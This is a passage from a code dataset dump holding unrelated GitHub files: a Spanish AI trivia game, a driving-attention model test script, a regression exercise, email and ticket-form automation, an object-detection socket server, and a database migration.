siguientes preguntas escribiendo la letra de la alternativa y presionando 'Enter' para enviar tu respuesta:\\n\"\n )\n input(\"Presiona Enter para continuar\"+RESET)\n time.sleep(1) \n print(MAGENTA+\"\\nEmpezando la trivia...\\n\"+RESET)\n time.sleep(1)\n print(\n YELLOW+\"1) ¿Cuándo se estableció formalmente el término ‘Inteligencia Artificial?\\n\"+RESET\n )\n print(\"a) En 1968, con la película ‘2001: Una odisea en el Espacio’\")\n print(\"b) En 1956, durante la Conferencia de Dartmouth\")\n print(\n \"c) En 1997, después de una computadora autónoma (Deep Blue) ganase al campeón mundial de ajedrez Gari Kaspárov\"\n )\n print(\"d) En 1971, cuando Ray Tomlinson envío el primer email.\")\n respuesta_1 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_1 not in 
(\"a\", \"b\", \"c\", \"d\"):\n respuesta_1 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n# Verificacion de respuesta\n if respuesta_1 == \"b\":\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 2\n\n print(YELLOW+\"\\n2) ¿Cuál es la diferencia entre IA débil e IA fuerte?\\n\"+RESET)\n print(\n \"a) La débil está creada para realizar una tarea concreta. La fuerte es capaz de imitar el procesamiento de la información propio de los seres humanos\"\n )\n print(\n \"b) La débil solo lee los labios. La fuerte convierte la voz en texto\"\n )\n print(\n \"c) La débil busca soluciones simples a problemas. La fuerte indaga más profundamente en el problema y aporta respuestas muy elaboradas para programar robots\"\n )\n print(\"d) Ninguna de las anteriores\")\n\n # Almacenamos la respuesta\"\n respuesta_2 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_2 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_2 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \"\n )\n\n# Verificacion de respuesta\n if respuesta_2 == \"b\":\n print(RED+\"\\nIncorrecto!\", nombre, \"!\"+RESET)\n elif respuesta_2 == \"c\":\n print(RED+\"\\nIncorrecto!\", nombre, \"!\"+RESET)\n elif respuesta_2 == \"d\":\n print(RED+\"\\nIncorrecto!\", nombre, \"!\"+RESET)\n else:\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 3\n\n print(YELLOW+\n \"\\n3) ¿Qué juego de mesa ha tenido un papel muy importante en el desarrollo de la IA?\\n\"+RESET\n )\n print(\"a) Dominó\")\n print(\"b) Ajedrez\")\n print(\"c) Scrabble\")\n print(\"d) Damas\")\n\n \n respuesta_3 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_3 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_3 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n if respuesta_3 == \"b\":\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 4\n\n print(YELLOW+\"\\n4) ¿En qué se diferencia un programa informático de una IA?\\n\"+RESET)\n print(\n \"a) Un programa informático es solo una lista de órdenes que le dice al ordenador lo que tiene que hacer.\"\n )\n print(\n \"b) La gran revolución de la IA es que no recibe órdenes para obtener un resultado.\"\n )\n print(\n \"c) Con un programa informático, una máquina no piensa. Simplemente, hace exactamente lo que le dicen.\"\n )\n print(\"d) Todas son correctas\")\n respuesta_4 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_4 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_4 = input(\n \"Debes responder a, b, c o d. 
Ingresa nuevamente tu respuesta: \")\n\n\n if respuesta_4 == \"d\":\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 5 comodin\n\n print(GREEN+\"\\nPregunta Comodin :)\"+RESET)\n print(YELLOW+\n \"\\n5) Sistemas que piensan como humanos: automatizan actividades como la toma de decisiones, la resolución de problemas y el aprendizaje\\n\"+RESET\n )\n print(\"a) Agentes inteligentes\")\n print(\"b) Robots\")\n print(\"c) Redes neuronales artificiales\")\n print(\"d) Sistemas expertos\")\n respuesta_5 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_5 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_5 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n# Verificamos su respuesta para mandar un mensaje de acierto con multilplicador usando random o de error\n if respuesta_5 == \"c\":\n puntaje += 2 * comodin\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n print(MAGENTA+\"\\nGracias\", nombre, \"por jugar mi trivia, alcanzaste\", puntaje,\n \"puntos sobre 20\"+RESET)\n if puntaje >20:\n print(CYAN+\"Sacaste mas de 20 eres un GENIO!\"+RESET)\n elif puntaje > 10:\n print(CYAN+\"Sigue asi lo hiciste muy bien!\"+RESET)\n else:\n print(CYAN+\"No te rindas! Puedes mejorar :)\"+RESET)\n \n print(GREEN+\"\\n¿Deseas intentar la trivia nuevamente?\")\n repetir_trivia = input(\n \"Ingresa 'si' para repetir, o cualquier tecla para finalizar: \").lower(\n )\n\n if repetir_trivia != \"si\": \n print(\"\\nEspero\", nombre, \"que lo hayas pasado bien, hasta pronto!\"+RESET)\n iniciar_trivia = False \n","repo_name":"jfraan/TriviaIA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10149544007","text":"#!/usr/bin/env python\n#|**********************************************************************;\n# Project : Explainable Deep Driving\n#\n# File name : Step3_1_test_Attention.py\n#\n# Author : Jinkyu Kim\n#\n# Date created : 20181214\n#\n# Purpose : Testing Visual Attention Model \n#\n# Revision History :\n#\n# Date Author Ref Revision\n# 20181214 jinkyu 1 initiated\n#\n# Remark\n#|**********************************************************************;\n\nimport argparse\nimport sys\nimport os\nimport numpy as np\nimport h5py\nimport tensorflow as tf\nfrom collections import namedtuple\nfrom src.utils import *\nfrom src.preprocessor import *\nfrom src.config import *\nfrom src.VA \t import *\nfrom sys import platform\nfrom tqdm import tqdm\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Path viewer')\n parser.add_argument('--getscore', type=bool, default=False, help='get performance scores')\n parser.add_argument('--showvideo', type=bool, default=False, help='show video')\n parser.add_argument('--useCPU', type=bool, default=False, help='without GPU processing')\n parser.add_argument('--validation', type=bool, default=False, help='use validation set')\n parser.add_argument('--gpu_fraction', type=float, default=0.7, help='GPU usage limit')\n parser.add_argument('--extractAttn', type=bool, default=True, help='extract attention maps')\n args = parser.parse_args()\n\n if platform == 'darwin':\n args.model = \"./model/VA/model-0.ckpt\"\n args.savepath = \"./result/VA/\"\n config.timelen = 400+3\n 
timelen = 400\n config.batch_size = 1\n else:\n raise NotImplementedError\n\n if args.getscore: check_and_make_folder(args.savepath)\n if args.extractAttn: check_and_make_folder(config.h5path + \"attn/\")\n\n # prepare datasets\n if args.validation: filenames = os.path.join(config.h5path, 'val.txt' )\n else: filenames = os.path.join(config.h5path, 'train.txt')\n\n with open(filenames, 'r') as f:\n fname = ['%s'%x.strip() for x in f.readlines()]\n\n # Create VA model\n VA_model = VA(alpha_c=config.alpha_c)\n alphas, y_acc, y_course = VA_model.inference()\n\n if args.useCPU: # Use CPU only\n tfconfig = tf.ConfigProto( device_count={'GPU':0}, intra_op_parallelism_threads=1)\n sess = tf.Session(config=tfconfig)\n else: # Use GPU\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_fraction)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n # Preprocessor\n pre_processor = PreProcessor_VA(timelen=timelen, phase='test')\n\n # Load the pretrained model\n saver = tf.train.Saver()\n if args.model is not None:\n saver.restore(sess, args.model)\n print(\"\\rLoaded the pretrained model: {}\".format(args.model))\n\n for dataset in tqdm(fname):\n print(bcolors.HIGHL+\"Dataset: {}\".format(dataset)+bcolors.ENDC)\n\n log = h5py.File(config.h5path + \"log/\" + dataset + \".h5\", \"r\")\n feats = h5py.File(config.h5path + \"feat/\"+ dataset + \".h5\", \"r\")\n cam = h5py.File(config.h5path + \"cam/\" + dataset + \".h5\", \"r\")\n nImg = cam['X'].shape[0]\n nFeat = feats['X'].shape[0]\n\n # initialization\n feat_batch = np.zeros((timelen, 64, 12, 20))\n curvature_batch = np.zeros((timelen, 1))\n accel_batch = np.zeros((timelen, 1))\n speed_batch = np.zeros((timelen, 1))\n course_batch = np.zeros((timelen, 1))\n goaldir_batch = np.zeros((timelen, 1))\n timestamp_batch = np.zeros((timelen, 1))\n\n # preprocess logs\n feat_batch[:nFeat] = feats['X'][:]\n timestamp_batch[:nFeat] = preprocess_others(log[\"timestamp\"][:], nImg)[3:]\n curvature_batch[:nFeat] = preprocess_others(log[\"curvature\"][:], nImg)[3:] \n accel_batch[:nFeat] = preprocess_others(log[\"accelerator\"][:], nImg)[3:] \n speed_batch[:nFeat] = preprocess_others(log[\"speed\"][:], nImg)[3:] \n course_batch[:nFeat] = preprocess_course(log[\"course\"][:], nImg)[3:] \n goaldir_batch[:nFeat] = preprocess_others(log[\"goaldir\"][:], nImg)[3:]\n\n # Preprocessing for tensorflow\n feat_p, _, acc_p, speed_p, course_p, _, goaldir_p, _ = pre_processor.process(\n \t\tsess=sess, \n \t\tinImg=np.expand_dims(np.array(feat_batch),0), \n \t\tcourse=np.expand_dims(np.array(course_batch),0), \n \t\tspeed=np.expand_dims(np.array(speed_batch),0), \n \t\tcurvature=np.expand_dims(np.array(curvature_batch),0), \n \t\taccelerator=np.expand_dims(np.array(accel_batch),0), \n \t\tgoaldir=np.expand_dims(np.array(goaldir_batch),0) )\n\n # Run a model\n feed_dict = {VA_model.features: feat_p,\n VA_model.speed: speed_p,\n VA_model.goaldir: goaldir_p}\n alps, pred_accel, pred_courses = sess.run([alphas, y_acc, y_course], feed_dict)\n alps = np.squeeze(alps)\n\n if args.extractAttn:\n print(config.h5path + \"attn/\" + dataset + \".h5\")\n f = h5py.File(config.h5path + \"attn/\" + dataset + \".h5\", \"w\")\n dset = f.create_dataset(\"/attn\", data=alps, chunks=(20,240))\n dset = f.create_dataset(\"/timestamp\",data=timestamp_batch, chunks=(20,1))\n dset = f.create_dataset(\"/curvature\",data=curvature_batch, chunks=(20,1))\n dset = f.create_dataset(\"/accel\", data=accel_batch, chunks=(20,1))\n dset = f.create_dataset(\"/speed\", 
data=speed_batch, chunks=(20,1))\n dset = f.create_dataset(\"/course\", data=course_batch, chunks=(20,1))\n dset = f.create_dataset(\"/goaldir\", data=goaldir_batch, chunks=(20,1))\n dset = f.create_dataset(\"/pred_accel\", data=np.expand_dims(pred_accel,1), chunks=(20,1))\n dset = f.create_dataset(\"/pred_courses\", data=np.expand_dims(pred_courses,1), chunks=(20,1))\n\n # Total Result\n print(bcolors.HIGHL + 'Done' + bcolors.ENDC)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"JinkyuKimUCB/explainable-deep-driving","sub_path":"Step3_1_test_Attention.py","file_name":"Step3_1_test_Attention.py","file_ext":"py","file_size_in_byte":6032,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"37849644236","text":"import pandas as pd \r\nimport numpy as np \r\n\r\ndataset = pd.read_csv(\"C:/Users/Hemal/Desktop/BDA Semester-3/Machine Learning-2/Python/petrol_consumption.csv\") \r\n\r\ndataset.head()\r\ndataset.describe() \r\n\r\nX = dataset.drop('Petrol_Consumption', axis=1) \r\ny = dataset['Petrol_Consumption'] \r\n\r\nfrom sklearn.model_selection import train_test_split \r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) \r\n\r\nfrom sklearn.tree import DecisionTreeRegressor \r\nregressor = DecisionTreeRegressor() \r\nregressor.fit(X_train, y_train) \r\ny_pred = regressor.predict(X_test) \r\n\r\ndf=pd.DataFrame({'Actual':y_test, 'Predicted':y_pred}) \r\nprint(df) \r\n\r\nfrom sklearn import metrics \r\nprint('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_pred)) \r\nprint('Mean Squared Error:', metrics.mean_squared_error(y_test, y_pred)) \r\nprint('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_pred))) \r\n\r\n","repo_name":"shrddha-p-jain/Machine-Learning-Assignments","sub_path":"DecisionTreeRegression.py","file_name":"DecisionTreeRegression.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"20832564284","text":"\"\"\" Test utilities for Resilient \"\"\"\n\n\ndef verify_subset(expected, actual):\n \"\"\"Test that the values match, where expected can be a subset of actual\"\"\"\n if isinstance(expected, dict):\n assert isinstance(actual, dict)\n for (key, value) in expected.items():\n verify_subset(value, actual.get(key))\n elif isinstance(expected, list):\n assert isinstance(actual, list)\n for evalue, avalue in zip(expected, actual):\n verify_subset(evalue, avalue)\n else:\n assert expected == actual\n","repo_name":"ibmresilient/resilient-python-api","sub_path":"pytest-resilient-circuits/pytest_resilient_circuits/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"73"} +{"seq_id":"28873458477","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 30 18:26:05 2020\r\n\r\n@author: Matthieu\r\n\"\"\"\r\n\r\n\r\nglobal retour\r\n\r\n\r\n##############################################################################\r\n### DECLARATION DES CLASS ET DES FONCTIONS\r\n##############################################################################\r\ndef envoiMail(destinataire, objet, corps, cc):\r\n email_source = \"email@source.fr\"\r\n \r\n from win32com.client import Dispatch\r\n Outlook = Dispatch('Outlook.application')\r\n mail = Outlook.CreateItem(0)\r\n mail.SentOnBehalfOfName=email_source\r\n mail.To = 
destinataire\r\n mail.CC = email_source+cc\r\n mail.Subject = objet\r\n mail.GetInspector\r\n\r\n index = mail.HTMLbody.find('>', mail.HTMLbody.find('
Information complémentaire : \"+commentaire\r\n corps+=\"
Nous avons ouvert l’incident : \"+ticket+\".

driver.find_element_by_xpath(\"//input[@name='INFO_DLAM_CONCERNE'][@value='ORANGE_BOUYGUES']\").click()\r\n driver.find_element_by_name('INFO_FLUX_TV_OPE').click()\r\n driver.find_element_by_xpath(\"//input[@name='INFO_ADELIA'][@value='PAS_INCIDENT']\").click()\r\n driver.find_element_by_name(\"INFO_ND_1\").send_keys(num_telephone)\r\n\r\n #onglet Défauts constatés\r\n driver.find_element_by_partial_link_text('Défauts constatés').click()\r\n driver.find_element_by_name(typeIncident).click()\r\n driver.find_element_by_name(qualite).click()\r\n driver.find_element_by_name(\"DEFECT_LIBELLE_CHAINE\").send_keys(chaine)\r\n driver.find_element_by_name(\"DEFECT_NUM_ZAP\").send_keys(zap)\r\n driver.find_element_by_name(\"DEFECT_DESCRIPTION\").send_keys(probleme)\r\n if(typeIncident==\"DEFECT_INTERRUPTION\"):\r\n driver.find_element_by_name(\"DEFECT_NATURE_INTERRUPTION\").send_keys(probleme)\r\n elif(typeIncident==\"DEFECT_DEGRADATION\"):\r\n driver.find_element_by_name(\"DEFECT_NATURE_DEGRAD\").send_keys(probleme)\r\n\r\n driver.find_element_by_name(\"description\").send_keys(commentaire)\r\n driver.find_element_by_xpath(\"//*[@value='Déposer']\").click()\r\n\r\n\r\n\r\n\r\ndef messageErreur(message, titre):\r\n from PyQt5.QtWidgets import QMessageBox\r\n from PyQt5.QtCore import Qt\r\n\r\n #il faut une app pour faire un widget messagebox, ici c'est fourni dans le main directement sinon il faut decommenter la ligne du dessous\r\n # appInterne = QApplication(sys.argv)\r\n msgBox = QMessageBox()\r\n msgBox.setIcon(QMessageBox.Information)\r\n msgBox.setText(message)\r\n msgBox.setTextInteractionFlags((Qt.LinksAccessibleByKeyboard\r\n | Qt.LinksAccessibleByMouse\r\n | Qt.TextBrowserInteraction\r\n | Qt.TextSelectableByKeyboard\r\n | Qt.TextSelectableByMouse))\r\n msgBox.setTextFormat(Qt.RichText)\r\n msgBox.setWindowTitle(titre)\r\n msgBox.setStandardButtons(QMessageBox.Ok)\r\n msgBox.exec()\r\n\r\n\r\n\r\n##############################################################################\r\n### GENERAL\r\n##############################################################################\r\n\r\n\r\ndef traitement_general_declenchement_iptv(retour, mdp_orf):\r\n if (retour[1]==\"GCF\"):\r\n #si on a orange déclenchement par l'interface\r\n #d'abord on modifie les informations pour aller avec les valeurs du site :\r\n \r\n #changement de la valeur de type incident par le nom du champ a cliquer correspondant\r\n if (retour[6]==\"Interruption\"):\r\n retour[6]=\"DEFECT_INTERRUPTION\"\r\n elif (retour[6]==\"Dégradation\"):\r\n retour[6]=\"DEFECT_DEGRADATION\"\r\n \r\n #pareil qu'au dessus mais pour la qualité\r\n if (retour[7]==\"HD et SD\"):\r\n retour[7]=\"SD_HD\"\r\n retour[7]=\"DEFECT_TV_\"+retour[7]\r\n \r\n declenchementOrange(mdp_orf, retour[0], retour[2], retour[3], retour[4], retour[5], retour[6], retour[7])\r\n \r\n else:\r\n #sinon on prépare un mail\r\n #lecture du fichier pour trouver le mail du partenaire\r\n destinataire=retour[1]\r\n if (destinataire!=\"Autre\"):\r\n destinataire, cc = rechercheMailPartenaire(destinataire)\r\n \r\n if (destinataire == \"\"):\r\n messageErreur(\"Partenaire non trouvé dans le fichier des adresses mails.\", \"ERREUR partenaire\")\r\n destinataire=\"\"\r\n cc=\"\"\r\n else : \r\n destinataire=\"\"\r\n cc=\"\"\r\n preparationEnvoiMail(retour[0], retour[2], retour[4], retour[5], destinataire, 
cc)","repo_name":"Matthh9/menu_service","sub_path":"programme_declenchement_iptv.py","file_name":"programme_declenchement_iptv.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70482460716","text":"class Solution:\n def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]:\n products.sort()\n result = []\n wordLen = len(searchWord)\n for i in range(1,wordLen+1):\n result.append([])\n for product in products:\n if len(product) >= i and product[:i] == searchWord[:i]:\n result[-1].append(product)\n if len(result[-1]) >= 3: break\n \n return result","repo_name":"BenjaminHalko/LeetCode-Solutions","sub_path":"1268-search-suggestions-system/1268-search-suggestions-system.py","file_name":"1268-search-suggestions-system.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12994477255","text":"#!/usr/bin/env python\n##\n## server.py - detection server\n##\n## usage:\n## (dummy) $ python server.py\n## (tiny w/cpu) $ python server.py yolov3-tiny.onnx\n## (full w/cuda) $ python server.py -m cuda yolov3-full.onnx\n##\nimport sys\nimport logging\nimport time\nimport selectors\nimport socket\nimport struct\nimport random\nfrom detector import DummyDetector, ONNXDetector\n\n\n## SocketHandler\n##\nclass SocketHandler:\n\n BUFSIZ = 65535\n\n def __init__(self, sock):\n self.logger = logging.getLogger()\n self.sock = sock\n self.addr = sock.getsockname()\n self.loop = None\n self.alive = True\n return\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: addr={self.addr}>'\n\n def idle(self):\n return self.alive\n\n def action(self, ev):\n return\n\n def shutdown(self):\n self.alive = False\n return\n\n def close(self):\n self.sock.close()\n self.sock = None\n self.loop = None\n self.logger.info(f'closed: {self}')\n return\n\n\n## TCPService\n##\nclass TCPService(SocketHandler):\n\n def __init__(self, sock):\n super().__init__(sock)\n self.buf = b''\n return\n\n def action(self, ev):\n try:\n data = self.sock.recv(self.BUFSIZ)\n except OSError:\n self.shutdown()\n return\n if data:\n i0 = 0\n while i0 < len(data):\n i1 = data.find(b'\\n', i0)\n if i1 < 0:\n self.buf += data[i0:]\n break\n self.buf += data[i0:i1+1]\n self.feedline(self.buf)\n self.buf = b''\n i0 = i1+1\n else:\n if self.buf:\n self.feedline(self.buf)\n self.shutdown()\n return\n\n def feedline(self, line):\n return\n\n\n## UDPService\n##\nclass UDPService(SocketHandler):\n\n def __init__(self, sock):\n super().__init__(sock)\n return\n\n def action(self, ev):\n try:\n (data, addr) = self.sock.recvfrom(self.BUFSIZ)\n self.recvdata(data, addr)\n except OSError:\n self.shutdown()\n return\n\n def recvdata(self, data, addr):\n return\n\n\n## TCPServer\n##\nclass TCPServer(SocketHandler):\n\n def __init__(self, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('', port))\n sock.listen(1)\n super().__init__(sock)\n self.port = port\n self.logger.info(f'listening: port={port}...')\n return\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: port={self.port}>'\n\n def action(self, ev):\n (conn, addr) = self.sock.accept()\n self.logger.info(f'accept: {addr}')\n self.loop.add(self.get_service(conn))\n return\n\n def get_service(self, conn):\n return TCPService(self, conn)\n\n\n## EventLoop\n##\nclass 
EventLoop:\n\n def __init__(self):\n self.logger = logging.getLogger()\n self.selector = selectors.DefaultSelector()\n self.handlers = {}\n return\n\n def add(self, handler):\n fd = self.selector.register(handler.sock, selectors.EVENT_READ)\n assert fd not in self.handlers\n self.handlers[fd] = handler\n self.logger.info(f'added: {handler}')\n handler.loop = self\n return\n\n def run(self, interval=0.1):\n while True:\n for (fd, ev) in self.selector.select(interval):\n if ev & selectors.EVENT_READ and fd in self.handlers:\n handler = self.handlers[fd]\n handler.action(ev)\n self.idle()\n return\n\n def idle(self):\n removed = []\n for (fd, handler) in self.handlers.items():\n if not handler.idle():\n removed.append((fd, handler))\n for (fd, handler) in removed:\n self.selector.unregister(handler.sock)\n del self.handlers[fd]\n self.logger.info(f'removed: {handler}')\n handler.close()\n return\n\n\n## DetectService\n##\nclass DetectService(UDPService):\n\n CHUNK_SIZE = 40000\n\n def __init__(self, sock, detector, rtp_host, rtp_port, session_id, timeout=10):\n super().__init__(sock)\n self.detector = detector\n self.rtp_host = rtp_host\n self.rtp_port = rtp_port\n self.session_id = session_id\n self.timeout = timeout\n self._recv_buf = b''\n self._recv_seqno = 0\n self._send_seqno = 0\n return\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: rtp_host={self.rtp_host}, rtp_port={self.rtp_port}, session_id={self.session_id}>'\n\n def init(self):\n self.logger.info(f'init: rtp_host={self.rtp_host}, rtp_port={self.rtp_port}, session_id={self.session_id}>')\n data = b'\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n self.sock.sendto(data, (self.rtp_host, self.rtp_port))\n self._send_seqno += 1\n return\n\n def recvdata(self, data, addr):\n if addr != (self.rtp_host, self.rtp_port): return\n (flags,pt,seqno) = struct.unpack('>BBH', data[:4])\n self.logger.debug(\n f'recv: flags={flags}, pt={pt}, seqno={seqno}')\n if self._recv_seqno != seqno:\n # Packet drop detected. 
Cancelling the current payload.\n self.logger.info(f'recv: DROP {seqno}/{self._recv_seqno}')\n self._recv_buf = None\n if (pt & 0x7f) == 96 and self._recv_buf is not None:\n self._recv_buf += data[4:]\n if pt & 0x80:\n # Significant packet - ending the payload.\n if self._recv_buf is not None:\n self.process_data(self._recv_buf)\n self._recv_buf = b''\n self._recv_seqno = seqno+1\n return\n\n def process_data(self, data):\n self.logger.debug(f'process_data: {len(data)}')\n if len(data) < 16: return # invalid data\n (tp, reqid, threshold, length) = struct.unpack('>4sLLL', data[:16])\n data = data[16:]\n if len(data) != length: return # missing data\n t0 = time.time()\n results = self.detector.perform(data, threshold=threshold*0.01)\n msec = int((time.time() - t0)*1000)\n buf = b''\n for (klass, conf, x, y, w, h) in results:\n buf += struct.pack(\n '>BBhhhh', klass, int(conf*255),\n int(x), int(y), int(w), int(h))\n header = struct.pack('>4sLLL', b'YOLO', reqid, msec, len(buf))\n self.send(header+buf)\n return\n\n def send(self, data, chunk_size=CHUNK_SIZE):\n i0 = 0\n while i0 < len(data):\n i1 = i0 + chunk_size\n pt = 96\n if len(data) <= i1:\n pt |= 0x80\n header = struct.pack('>BBH', 0x80, pt, self._send_seqno & 0xffff)\n self._send_seqno += 1\n segment = data[i0:i1]\n self.sock.sendto(header+segment, (self.rtp_host, self.rtp_port))\n i0 = i1\n return\n\n## RTSPService\n##\nclass RTSPService(TCPService):\n\n def __init__(self, sock, detectors):\n super().__init__(sock)\n self.detectors = detectors\n self.service = None\n return\n\n def feedline(self, req):\n (cmd,_,args) = req.strip().partition(b' ')\n cmd = cmd.upper()\n if cmd == b'FEED':\n self.startfeed(args)\n else:\n self.sock.send(b'!UNKNOWN\\r\\n')\n self.logger.error(f'unknown command: req={req!r}')\n return\n\n def close(self):\n super().close()\n if self.service is not None:\n self.service.shutdown()\n self.service = None\n return\n\n # startfeed: \"FEED clientport path\"\n def startfeed(self, args):\n self.logger.debug(f'startfeed: args={args!r}')\n flds = args.split()\n if len(flds) < 2:\n self.sock.send(b'!INVALID\\r\\n')\n self.logger.error(f'startfeed: invalid args: args={args!r}')\n return\n try:\n rtp_port = int(flds[0])\n path = flds[1].decode('utf-8')\n detector = self.detectors[path]\n except (UnicodeError, ValueError, KeyError):\n self.sock.send(b'!INVALID\\r\\n')\n self.logger.error(f'startfeed: invalid args: args={args!r}')\n return\n (rtp_host, _) = self.sock.getpeername()\n # random.randbytes() is only supported in 3.9.\n session_id = bytes( random.randrange(256) for _ in range(4) )\n sock_rtp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock_rtp.setblocking(False)\n sock_rtp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock_rtp.bind(('', 0))\n (_, port) = sock_rtp.getsockname()\n self.logger.info(f'startfeed: port={port}, rtp_host={rtp_host}, rtp_port={rtp_port}, session_id={session_id.hex()}, path={path}, detector={detector}')\n text = f'+OK {port} {session_id.hex()}'\n self.sock.send(text.encode('ascii')+b'\\r\\n')\n self.service = DetectService(\n sock_rtp, detector, rtp_host, rtp_port, session_id)\n self.service.init()\n self.loop.add(self.service)\n return\n\n## RTSPServer\n##\nclass RTSPServer(TCPServer):\n\n def __init__(self, port, detectors):\n super().__init__(port)\n self.detectors = detectors\n return\n\n def get_service(self, conn):\n return RTSPService(conn, self.detectors)\n\n# main\ndef main(argv):\n import getopt\n def usage():\n print(f'usage: {argv[0]} [-d] [-o dbgout] [-m 
mode] [-s port] [-t interval] [name:num_classes:onnx]')\n return 100\n try:\n (opts, args) = getopt.getopt(argv[1:], 'do:m:s:t:')\n except getopt.GetoptError:\n return usage()\n level = logging.INFO\n mode = None\n server_port = 10000\n interval = 0.1\n dbgout = None\n for (k, v) in opts:\n if k == '-d': level = logging.DEBUG\n elif k == '-o': dbgout = v\n elif k == '-m': mode = v\n elif k == '-s': server_port = int(v)\n elif k == '-t': interval = float(v)\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=level)\n\n # Server mode.\n detectors = {}\n if args:\n for arg in args:\n (name,num_classes,path) = arg.split(':')\n detector = ONNXDetector(path, mode=mode, num_classes=int(num_classes), dbgout=dbgout)\n detectors[name] = detector\n else:\n detectors['detect'] = DummyDetector(dbgout=dbgout)\n logging.info(f'detectors={detectors}')\n loop = EventLoop()\n loop.add(RTSPServer(server_port, detectors))\n loop.run(interval)\n return 0\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","repo_name":"euske/fastdet","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40526234511","text":"\"\"\"add_food_model\n\nRevision ID: 8e40e31eff4d\nRevises: 3bb17e0138f8\nCreate Date: 2019-12-12 14:03:43.353943\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '8e40e31eff4d'\ndown_revision = '3bb17e0138f8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('food_order',\n sa.Column('food_order_id', sa.Integer(), nullable=False),\n sa.Column('order_date', sa.Date(), nullable=True),\n sa.Column('ordering_user_id', sa.Integer(), nullable=True),\n sa.Column('link', sa.String(length=512), nullable=True),\n sa.ForeignKeyConstraint(['ordering_user_id'], ['users.user_id'], ),\n sa.PrimaryKeyConstraint('food_order_id')\n )\n op.create_table('food_order_item',\n sa.Column('food_order_item_id', sa.Integer(), nullable=False),\n sa.Column('food_order_id', sa.Integer(), nullable=True),\n sa.Column('eating_user_id', sa.Integer(), nullable=True),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('cost', sa.DECIMAL(precision=18, scale=2), nullable=True),\n sa.Column('paid', sa.Boolean(), nullable=True),\n sa.Column('surrender', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['eating_user_id'], ['users.user_id'], ),\n sa.ForeignKeyConstraint(['food_order_id'], ['food_order.food_order_id'], ),\n sa.PrimaryKeyConstraint('food_order_item_id')\n )\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
